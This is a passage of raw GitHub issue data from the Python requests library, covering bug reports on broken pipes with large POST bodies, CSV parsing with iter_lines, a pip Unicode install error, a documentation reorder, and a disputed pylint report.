triggered the connection teardown.\n", "@Lukasa \n\nWell, one thing is clear - it happens only when large amounts of data (files) and transferred.\n", "@barseghyanartur Yup, but that doesn't necessarily mean much. You can only get an EPIPE if the remote end forcibly closes the connection, which is only likely to happen for large data files.\n", "@Lukasa \n\nAre you interested to know what happens if 20 Mb plain text (textarea) is posted?\n", "I'm really interested in seeing something happening here in plaintext. =D\n", "Well, for whatever reason I just can't get tcpdump to actually capture the packets. I get output like this:\n\n```\n0 packets captured\n303 packets received by filter\n0 packets dropped by kernel\n```\n\nBut this example breaks for me, again with Python 2.7.8 and requests 2.5.3:\n\n```\n#!/usr/bin/env python\n\nimport requests\n\nline = '.' * 79 + '\\n'\ndata = line * 10000000\nresponse = requests.post('http://127.0.0.1:8000', data=data)\nprint(response)\n```\n\nHere is the stack trace (again with home dir redacted as `~`):\n\n```\n$ ./requests_test.py \nTraceback (most recent call last):\n File \"./requests_test.py\", line 7, in <module>\n response = requests.post('http://127.0.0.1:8000', data=data)\n File \"~/anaconda/envs/py278/lib/python2.7/site-packages/requests/api.py\", line 99, in post\n return request('post', url, data=data, json=json, **kwargs)\n File \"~/anaconda/envs/py278/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"~/anaconda/envs/py278/lib/python2.7/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"~/anaconda/envs/py278/lib/python2.7/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"~/anaconda/envs/py278/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n raise ConnectionError(err, request=request)\nrequests.exceptions.ConnectionError: ('Connection aborted.', error(32, 'Broken pipe'))\n```\n\nI can capture the packets with Wireshark. I know that you're looking for a particular kind of plaintext output from tcpdump, but would you happen to know how to get the equivalent plaintext output from Wireshark? \nOn the off chance that it would work for you, I've created a gist, wireshark.txt, https://gist.github.com/JazzFan/8517983ff5eed2d95b10.\n", "@JazzFan In addition to what you sent me I need the actual packet data. There's a 40-byte TCP payload coming from your server in frame 60 that Wireshark is claiming is HTTP data, but it hasn't broken out the data itself so I can't see it.\n\nWhat tcpdump command are you running?\n", "I'm running\n\n```\nsudo tcpdump -nnvvXSs 1514 port 8000 and host 127.0.0.1 > tcpdump.txt\n```\n\nand variations on that (e.g., omitting the `and host 127.0.0.1`). After triggering the bug in another window and hitting `Ctrl-C` on the `tcpdump` command, I get something like\n\n```\n0 packets captured\n492 packets received by filter\n0 packets dropped by kernel\n```\n\nand an empty tcpdump.txt file. I interpret the output to mean that the filter saw the packets but didn't capture them, but I don't know why it didn't capture them.\n", "Also, FWIW, the 40 bytes of TCP data payload on packet 60 are\n\n```\n<html><body><h1>POST!</h1></body></html>\n```\n\nThis is just the standard response that my dummy HTTP server makes to any post request. FWIW, here is my HTTP server:\n\n``` python\n#!/usr/bin/env python\n\"\"\"\n\nVery simple HTTP server in python.\n\nUsage::\n ./dummy-web-server.py [<port>]\n\nSend a GET request::\n curl http://localhost\n\nSend a HEAD request::\n curl -I http://localhost\n\nSend a POST request::\n curl -d \"foo=bar&bin=baz\" http://localhost\n\n\"\"\"\nfrom BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer\nimport SocketServer\n\n\nclass S(BaseHTTPRequestHandler):\n def _set_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def do_GET(self):\n self._set_headers()\n self.wfile.write(\"<html><body><h1>hi!</h1></body></html>\")\n\n def do_HEAD(self):\n self._set_headers()\n\n def do_POST(self):\n # Doesn't do anything with posted data\n self._set_headers()\n self.wfile.write(\"<html><body><h1>POST!</h1></body></html>\")\n\n\ndef run(server_class=HTTPServer, handler_class=S, port=8000):\n server_address = ('', port)\n httpd = server_class(server_address, handler_class)\n print 'Starting httpd...'\n httpd.serve_forever()\n\n\nif __name__ == \"__main__\":\n from sys import argv\n\n if len(argv) == 2:\n run(port=int(argv[1]))\n else:\n run()\n```\n", "Oops, I forgot to include @Lukasa in my previous comments.\n" ]
https://api.github.com/repos/psf/requests/issues/2421
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2421/labels{/name}
https://api.github.com/repos/psf/requests/issues/2421/comments
https://api.github.com/repos/psf/requests/issues/2421/events
https://github.com/psf/requests/issues/2421
55,242,976
MDU6SXNzdWU1NTI0Mjk3Ng==
2,421
Quoted newlines not handled properly
{ "avatar_url": "https://avatars.githubusercontent.com/u/942461?v=4", "events_url": "https://api.github.com/users/jrootham/events{/privacy}", "followers_url": "https://api.github.com/users/jrootham/followers", "following_url": "https://api.github.com/users/jrootham/following{/other_user}", "gists_url": "https://api.github.com/users/jrootham/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/jrootham", "id": 942461, "login": "jrootham", "node_id": "MDQ6VXNlcjk0MjQ2MQ==", "organizations_url": "https://api.github.com/users/jrootham/orgs", "received_events_url": "https://api.github.com/users/jrootham/received_events", "repos_url": "https://api.github.com/users/jrootham/repos", "site_admin": false, "starred_url": "https://api.github.com/users/jrootham/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/jrootham/subscriptions", "type": "User", "url": "https://api.github.com/users/jrootham", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2015-01-23T04:06:42Z
2021-09-08T23:06:03Z
2015-01-23T15:36:40Z
NONE
resolved
When trying to use iter_lines() reader for csv to read an parse a csv file it failed. It turns out that if there is a quoted newline in the file it removes the comma quote delimiter for the quoted newline and the following line. This makes it impossible to use iter_lines for csv.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2421/reactions" }
https://api.github.com/repos/psf/requests/issues/2421/timeline
null
completed
null
null
false
[ "## Can you use a paste servIce to give a concrete example of this? I'm not sure I follow your description \n\nSent from my Android device with K-9 Mail. Please excuse my brevity.\n", "Input file:\n \"a\",\"\n \",\"b\"\n \"c\",\"\n \",\"d\"\n\nOutput stings\n \"a\"\n \"c\"\n", "I don't see how this is iter_lines' fault. It doesn't understand file formats, so it can't possibly know that it's in a CSV file and so that newlines can be quoted. It's not \"iter_semantic_lines\", and nor should it be. In this situation, you want to use iter_content.\n", "Sorry, it looks like my fault. I was faked out by my data source providing 2 different files with identical identifying headers.\n" ]
https://api.github.com/repos/psf/requests/issues/2420
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2420/labels{/name}
https://api.github.com/repos/psf/requests/issues/2420/comments
https://api.github.com/repos/psf/requests/issues/2420/events
https://github.com/psf/requests/pull/2420
55,242,311
MDExOlB1bGxSZXF1ZXN0Mjc4OTk2NjY=
2,420
Replace n-dash in HISTORY to workaround pip bug
{ "avatar_url": "https://avatars.githubusercontent.com/u/665269?v=4", "events_url": "https://api.github.com/users/chriskuehl/events{/privacy}", "followers_url": "https://api.github.com/users/chriskuehl/followers", "following_url": "https://api.github.com/users/chriskuehl/following{/other_user}", "gists_url": "https://api.github.com/users/chriskuehl/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/chriskuehl", "id": 665269, "login": "chriskuehl", "node_id": "MDQ6VXNlcjY2NTI2OQ==", "organizations_url": "https://api.github.com/users/chriskuehl/orgs", "received_events_url": "https://api.github.com/users/chriskuehl/received_events", "repos_url": "https://api.github.com/users/chriskuehl/repos", "site_admin": false, "starred_url": "https://api.github.com/users/chriskuehl/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/chriskuehl/subscriptions", "type": "User", "url": "https://api.github.com/users/chriskuehl", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-23T03:54:12Z
2021-09-08T09:01:01Z
2015-01-23T07:19:39Z
CONTRIBUTOR
resolved
There exists a problem (maybe a bug?) in pip when using a locale like `LC_ALL=C` (which is commonly used by CI environments and system configuration tools such as Puppet), where the PKG-INFO file is decoded using ascii, raising a UnicodeDecodeError when PKG-INFO contains non-ASCII characters (such as the n-dash removed by this commit): ``` Downloading/unpacking requests from https://pypi.python.org/packages/source/r/requests/requests-2.5.1.tar.gz Downloading requests-2.5.1.tar.gz (443Kb): 443Kb downloaded Running setup.py egg_info for package requests Exception: Traceback (most recent call last): File "/usr/lib/python3/dist-packages/pip/basecommand.py", line 104, in main status = self.run(options, args) File "/usr/lib/python3/dist-packages/pip/commands/install.py", line 245, in run requirement_set.prepare_files(finder, force_root_egg_info=self.bundle, bundle=self.bundle) File "/usr/lib/python3/dist-packages/pip/req.py", line 1014, in prepare_files req_to_install.assert_source_matches_version() File "/usr/lib/python3/dist-packages/pip/req.py", line 359, in assert_source_matches_version version = self.installed_version File "/usr/lib/python3/dist-packages/pip/req.py", line 351, in installed_version return self.pkg_info()['version'] File "/usr/lib/python3/dist-packages/pip/req.py", line 318, in pkg_info data = self.egg_info_data('PKG-INFO') File "/usr/lib/python3/dist-packages/pip/req.py", line 261, in egg_info_data data = fp.read() File "/usr/lib/python3.2/encodings/ascii.py", line 26, in decode return codecs.ascii_decode(input, self.errors)[0] UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 8161: ordinal not in range(128) ``` There are some existing issues for pip: - pypa/pip#1233 - pypa/pip#761 Other projects have had the same issue occur; there is some useful discussion in these issues as well: - cleder/fastkml#9 - gabrielfalcao/HTTPretty#108 - rbarrois/factory_boy#118 I know this isn't really a problem with requests (and should probably be addressed ultimately in pip), but I think replacing this character in HISTORY would be a pain-free and pragmatic way to help developers and system administrators, especially given the inactivity on the pip bug reports. Many thanks!
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2420/reactions" }
https://api.github.com/repos/psf/requests/issues/2420/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2420.diff", "html_url": "https://github.com/psf/requests/pull/2420", "merged_at": "2015-01-23T07:19:39Z", "patch_url": "https://github.com/psf/requests/pull/2420.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2420" }
true
[ "Yeah, I'm just sick of this now. Thanks! :cake:\n", "This is the second time these have snuck in. Where are they coming from? Do we think this closes #2419?\n", "I hope so.\n" ]
https://api.github.com/repos/psf/requests/issues/2419
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2419/labels{/name}
https://api.github.com/repos/psf/requests/issues/2419/comments
https://api.github.com/repos/psf/requests/issues/2419/events
https://github.com/psf/requests/issues/2419
55,033,747
MDU6SXNzdWU1NTAzMzc0Nw==
2,419
UnicodeDecodeError installing via pip-3.2
{ "avatar_url": "https://avatars.githubusercontent.com/u/858881?v=4", "events_url": "https://api.github.com/users/TFenby/events{/privacy}", "followers_url": "https://api.github.com/users/TFenby/followers", "following_url": "https://api.github.com/users/TFenby/following{/other_user}", "gists_url": "https://api.github.com/users/TFenby/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/TFenby", "id": 858881, "login": "TFenby", "node_id": "MDQ6VXNlcjg1ODg4MQ==", "organizations_url": "https://api.github.com/users/TFenby/orgs", "received_events_url": "https://api.github.com/users/TFenby/received_events", "repos_url": "https://api.github.com/users/TFenby/repos", "site_admin": false, "starred_url": "https://api.github.com/users/TFenby/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/TFenby/subscriptions", "type": "User", "url": "https://api.github.com/users/TFenby", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2015-01-21T15:32:05Z
2021-09-08T23:04:52Z
2015-05-03T15:08:23Z
NONE
resolved
So here's a weird one. I have a Docker container based on debian:stable where I install python3 and python3-pip, and when trying to install requests from a requirements.txt file I get the following: ``` Downloading/unpacking requests (from -r /tmp/requirements/xxx.txt (line 2)) Running setup.py egg_info for package requests Exception: Traceback (most recent call last): File "/usr/lib/python3/dist-packages/pip/basecommand.py", line 104, in main status = self.run(options, args) File "/usr/lib/python3/dist-packages/pip/commands/install.py", line 245, in run requirement_set.prepare_files(finder, force_root_egg_info=self.bundle, bundle=self.bundle) File "/usr/lib/python3/dist-packages/pip/req.py", line 1014, in prepare_files req_to_install.assert_source_matches_version() File "/usr/lib/python3/dist-packages/pip/req.py", line 359, in assert_source_matches_version version = self.installed_version File "/usr/lib/python3/dist-packages/pip/req.py", line 351, in installed_version return self.pkg_info()['version'] File "/usr/lib/python3/dist-packages/pip/req.py", line 318, in pkg_info data = self.egg_info_data('PKG-INFO') File "/usr/lib/python3/dist-packages/pip/req.py", line 261, in egg_info_data data = fp.read() File "/usr/lib/python3.2/encodings/ascii.py", line 26, in decode return codecs.ascii_decode(input, self.errors)[0] UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 8161: ordinal not in range(128) ``` However, when I run `pip-3.2 install requests` directly, it works fine. I honestly have no idea where even to start on debugging this.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2419/reactions" }
https://api.github.com/repos/psf/requests/issues/2419/timeline
null
completed
null
null
false
[ "This is a duplicate of an old error that was fixed. Can you confirm that the version of requests is pinned to something in the 2.x line but is not 2.5.1?\n", "#2196 is the already fixed issue for reference.\n", "I've tried it with no version pinned, pinned to 2.5.1, and pinned to 2.5.0.\nThe thing that I don't understand is why it only fails when installing from a requirements.txt file. \n" ]
https://api.github.com/repos/psf/requests/issues/2418
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2418/labels{/name}
https://api.github.com/repos/psf/requests/issues/2418/comments
https://api.github.com/repos/psf/requests/issues/2418/events
https://github.com/psf/requests/issues/2418
54,997,272
MDU6SXNzdWU1NDk5NzI3Mg==
2,418
Data argument introduced too early in Quickstart guide
{ "avatar_url": "https://avatars.githubusercontent.com/u/3679615?v=4", "events_url": "https://api.github.com/users/alfonsomhc/events{/privacy}", "followers_url": "https://api.github.com/users/alfonsomhc/followers", "following_url": "https://api.github.com/users/alfonsomhc/following{/other_user}", "gists_url": "https://api.github.com/users/alfonsomhc/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/alfonsomhc", "id": 3679615, "login": "alfonsomhc", "node_id": "MDQ6VXNlcjM2Nzk2MTU=", "organizations_url": "https://api.github.com/users/alfonsomhc/orgs", "received_events_url": "https://api.github.com/users/alfonsomhc/received_events", "repos_url": "https://api.github.com/users/alfonsomhc/repos", "site_admin": false, "starred_url": "https://api.github.com/users/alfonsomhc/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/alfonsomhc/subscriptions", "type": "User", "url": "https://api.github.com/users/alfonsomhc", "user_view_type": "public" }
[ { "color": "0b02e1", "default": false, "description": null, "id": 191274, "name": "Contributor Friendly", "node_id": "MDU6TGFiZWwxOTEyNzQ=", "url": "https://api.github.com/repos/psf/requests/labels/Contributor%20Friendly" } ]
closed
true
null
[]
null
8
2015-01-21T09:45:56Z
2021-09-08T23:05:53Z
2015-03-15T18:39:54Z
NONE
resolved
I'm following the quick start guide in: http://docs.python-requests.org/en/latest/user/quickstart/ I got confused when reading the section "Custom Headers" because the example code features the data argument, which hasn't been introduced in the guide yet (it is the next section "More complicated POST requests" that describes the data argument). My suggestion is to swap the order of those two sections, i.e. have "More complicated POST requests" before "Custom Headers", or modify the example code in "Custom Headers" (remove data argument).
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2418/reactions" }
https://api.github.com/repos/psf/requests/issues/2418/timeline
null
completed
null
null
false
[ "Agreed, this should be reworked. Marking as contributor friendly.\n", "Why not just leave out the data argument in the Custom Headers section? That section is clearly not meant to explain the usage of data argument. It is being discussed later on in the \"More complicated POST requests\" section. What do you guys say?\n", "The only reason to worry about it is that the header we're sending is a `Content-Type` one, which does rather require a body. \n", "Let's just set it to a useragent string then?\n", "Totally reasonable. =)\n", "Should I go ahead and submit a patch?\n\n## Outline:\n- Omit the data attribute.\n- Replace the headers with a user-agent string\n", "Make sure you change the verb, but sure. =)\n", "The full user-agent string is too long:\n`Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36`. Can I just write `Mozilla/5.0` or is it necessary to write the complete user-agent string?\n" ]
https://api.github.com/repos/psf/requests/issues/2417
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2417/labels{/name}
https://api.github.com/repos/psf/requests/issues/2417/comments
https://api.github.com/repos/psf/requests/issues/2417/events
https://github.com/psf/requests/issues/2417
54,903,649
MDU6SXNzdWU1NDkwMzY0OQ==
2,417
pylint friendly
{ "avatar_url": "https://avatars.githubusercontent.com/u/5856387?v=4", "events_url": "https://api.github.com/users/DavidHwu/events{/privacy}", "followers_url": "https://api.github.com/users/DavidHwu/followers", "following_url": "https://api.github.com/users/DavidHwu/following{/other_user}", "gists_url": "https://api.github.com/users/DavidHwu/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/DavidHwu", "id": 5856387, "login": "DavidHwu", "node_id": "MDQ6VXNlcjU4NTYzODc=", "organizations_url": "https://api.github.com/users/DavidHwu/orgs", "received_events_url": "https://api.github.com/users/DavidHwu/received_events", "repos_url": "https://api.github.com/users/DavidHwu/repos", "site_admin": false, "starred_url": "https://api.github.com/users/DavidHwu/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/DavidHwu/subscriptions", "type": "User", "url": "https://api.github.com/users/DavidHwu", "user_view_type": "public" }
[]
closed
true
null
[]
null
11
2015-01-20T16:21:35Z
2021-09-08T05:00:40Z
2015-01-20T16:51:45Z
NONE
resolved
Kindly request that requests be more pylint compliant. When evaluating which package to use, this comes up with a score of -154. ## Global evaluation Your code has been rated at -154.92/10 (previous run: -154.91/10, -0.00) Errors: Davids-MacBook-Pro-2:~ dhwu$ pylint -E /Users/dhwu/Desktop/Evals/HTTP\ Libs/requests-2.5.1/requests No config file found, using default configuration ************\* Module requests.compat E: 88, 4: No name 'quote' in module 'urllib' (no-name-in-module) E: 88, 4: No name 'unquote' in module 'urllib' (no-name-in-module) E: 88, 4: No name 'quote_plus' in module 'urllib' (no-name-in-module) E: 88, 4: No name 'unquote_plus' in module 'urllib' (no-name-in-module) E: 88, 4: No name 'urlencode' in module 'urllib' (no-name-in-module) E: 88, 4: No name 'getproxies' in module 'urllib' (no-name-in-module) E: 88, 4: No name 'proxy_bypass' in module 'urllib' (no-name-in-module) E: 98,10: Undefined variable 'unicode' (undefined-variable) E: 99,17: Using variable 'basestring' before assignment (used-before-assignment) E:100,26: Undefined variable 'long' (undefined-variable) ************\* Module requests.models E: 39,10: Instance of 'LookupDict' has no 'moved' member (no-member) E: 40,10: Instance of 'LookupDict' has no 'found' member (no-member) E: 41,10: Instance of 'LookupDict' has no 'other' member (no-member) E: 42,10: Instance of 'LookupDict' has no 'temporary_redirect' member (no-member) E: 43,10: Instance of 'LookupDict' has no 'permanent_redirect' member (no-member) E:343,18: Undefined variable 'unicode' (undefined-variable) E:634,74: Instance of 'LookupDict' has no 'moved_permanently' member (no-member) E:634,99: Instance of 'LookupDict' has no 'permanent_redirect' member (no-member) E:792,51: Instance of 'bool' has no 'decode' member (no-member) ************\* Module requests.sessions E:145,42: Instance of 'LookupDict' has no 'see_other' member (no-member) E:151,41: Instance of 'LookupDict' has no 'found' member (no-member) E:156,41: Instance of 'LookupDict' has no 'moved' member (no-member) E:162,46: Instance of 'LookupDict' has no 'temporary_redirect' member (no-member) E:162,72: Instance of 'LookupDict' has no 'permanent_redirect' member (no-member) ************\* Module requests.utils E:537,52: Module 'sys' has no 'pypy_version_info' member (no-member) E:538,52: Module 'sys' has no 'pypy_version_info' member (no-member) E:539,52: Module 'sys' has no 'pypy_version_info' member (no-member) E:540,15: Module 'sys' has no 'pypy_version_info' member (no-member) E:541,76: Module 'sys' has no 'pypy_version_info' member (no-member) ************\* Module requests.packages.chardet E: 23,52: Undefined variable 'unicode' (undefined-variable) ************\* Module requests.packages.chardet.compat E: 25,21: Undefined variable 'unicode' (undefined-variable) ************\* Module requests.packages.urllib3.connection E:159, 0: class already defined line 20 (function-redefined) ************\* Module requests.packages.urllib3.connectionpool E: 46,19: Instance of '_MovedItems' has no 'xrange' member (no-member) ************\* Module requests.packages.urllib3.request E: 4, 4: No name 'urlencode' in module 'urllib' (no-name-in-module) E: 49, 8: NotImplemented raised - should raise NotImplementedError (notimplemented-raised) ************\* Module requests.packages.urllib3.response E:182,36: Instance of 'str' has no 'read' member (no-member) E:186,36: Instance of 'str' has no 'read' member (no-member) E:195,33: Instance of 'str' has no 'close' member (no-member) E:296,21: Instance of 'str' has no 'close' member (no-member) E:303,28: Instance of 'str' has no 'closed' member (no-member) E:305,28: Instance of 'str' has no 'isclosed' member (no-member) E:313,28: Instance of 'str' has no 'fileno' member (no-member) E:320,28: Instance of 'str' has no 'flush' member (no-member) ************\* Module requests.packages.urllib3.contrib.ntlmpool E: 44,13: Instance of 'NTLMConnectionPool' has no 'num_connections' member (no-member) E: 46,24: Instance of 'NTLMConnectionPool' has no 'num_connections' member (no-member) E: 46,46: Instance of 'NTLMConnectionPool' has no 'host' member (no-member) E: 53,41: Instance of 'NTLMConnectionPool' has no 'host' member (no-member) E: 53,57: Instance of 'NTLMConnectionPool' has no 'port' member (no-member) ************\* Module requests.packages.urllib3.contrib.pyopenssl E: 58, 0: No name '_fileobject' in module 'socket' (no-name-in-module) E:158,33: Instance of 'OctetString' has no 'getComponentByPosition' member (no-member) E:158,33: Instance of 'Any' has no 'getComponentByPosition' member (no-member) E:158,33: Instance of 'str' has no 'getComponentByPosition' member (no-member) ************\* Module requests.packages.urllib3.packages.ordered_dict E: 82,35: Instance of 'dict' has no 'itervalues' member (no-member) E:142, 4: Method has no argument (no-method-argument) E:165,29: Instance of 'tuple' has no 'keys' member (no-member) ************\* Module requests.packages.urllib3.packages.six E: 42,19: Undefined variable 'basestring' (undefined-variable) E: 43,26: Undefined variable 'long' (undefined-variable) E: 44,31: Module 'types' has no 'ClassType' member (no-member) E: 45,16: Undefined variable 'unicode' (undefined-variable) E: 84,22: Instance of '_LazyDescr' has no '_resolve' member (no-member) E:294,15: Undefined variable 'unicode' (undefined-variable) E:341,36: Undefined variable 'basestring' (undefined-variable) E:347,31: Undefined variable 'unicode' (undefined-variable) E:353,31: Undefined variable 'unicode' (undefined-variable) E:361,35: Undefined variable 'unicode' (undefined-variable) E:365,22: Undefined variable 'unicode' (undefined-variable) E:366,20: Undefined variable 'unicode' (undefined-variable) ************\* Module requests.packages.urllib3.util.connection E: 87, 8: Raising NoneType while only classes or instances are allowed (raising-bad-type) ************\* Module requests.packages.urllib3.util.ssl_ E: 22, 4: No name 'OP_NO_SSLv2' in module 'ssl' (no-name-in-module) E: 22, 4: No name 'OP_NO_SSLv3' in module 'ssl' (no-name-in-module) E: 22, 4: No name 'OP_NO_COMPRESSION' in module 'ssl' (no-name-in-module) E: 41, 4: class already defined line 7 (function-redefined) Davids-MacBook-Pro-2:~ dhwu$
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2417/reactions" }
https://api.github.com/repos/psf/requests/issues/2417/timeline
null
completed
null
null
false
[ "Opening this kind of issue is exactly the kind of thing that is likely to get you some very negative comments indeed. =) Offering criticism without offering to help improve it is extremely bad manners. It's worse when the criticism is of the form \"Your project doesn't live up to my personal standard <x>\" as this is. It's worse still when your criticism is based on an automated tool that is _wrong_.\n\nAllow me to pick some examples:\n\n> E: 88, 4: No name 'quote' in module 'urllib' (no-name-in-module)\n\nThat's only true in Python 3, and the whole purpose of this module is to cover over differences between Python 2 and 3. All these errors are wrong.\n\n> E: 39,10: Instance of 'LookupDict' has no 'moved' member (no-member)\n\nStatic analysis of Python is _stupid_: it's a dynamic language! In practice, the instance gains this member at import time: any tool smart enough to import the module would have known this. These errors are all wrong.\n\n> E:537,52: Module 'sys' has no 'pypy_version_info' member (no-member)\n\nIt does on PyPy. Given that this is guarded by an 'if pypy' check, this error and all the ones like it are wrong.\n\n> E: 23,52: Undefined variable 'unicode' (undefined-variable)\n\nThere is on Python 2.\n\nAny of the errors on urllib3 are in the wrong module, which is even more obviously true of `six`.\n\nI'm being as polite as I can when I say that your tool is doing a _terrible_ job. I strongly advise you never to open a similar issue on a different repository, or you will likely encounter a much stronger negative reaction than this one.\n", "It looks like most of these are based around py2/3 compatibility which we have no intention of breaking. \n", "@Lukasa : I am following a well known practice that is detailed in Idiomatic Python author:\nhttp://www.jeffknupp.com/blog/2013/11/15/supercharge-your-python-developers/\nAlso detailed in Google coding standards.\nFWIW: pylint has caught many errors in my code and others in the past.\nWhile we may differ in our views, not placing value judgements. Just a data point.\nLike I said in my prior post, my intent is to weight differing approaches. Request at the top of that list.\n\nWas hoping that this kind ask would be more open to possible changes... looks like closed for discussion already.\n\nIf you guys are open, I'd be open to making changes once I had more time.\nBut then that would be un-welcomed based on your statement too.\nmy 2 cents\n", "To be clear: I do not believe anything that pylint has printed for modules outside `requests.packages` (which are third party code) is valid. I think everything it has said is wrong. If you can point to something that is not wrong, I will happily consider accepting a change based on it.\n\nI agree that pylint can catch errors. However, doing a drive-by dump of every line reported by pylint is not a helpful approach. Two notes for the future:\n1. Authors often have different views on Python 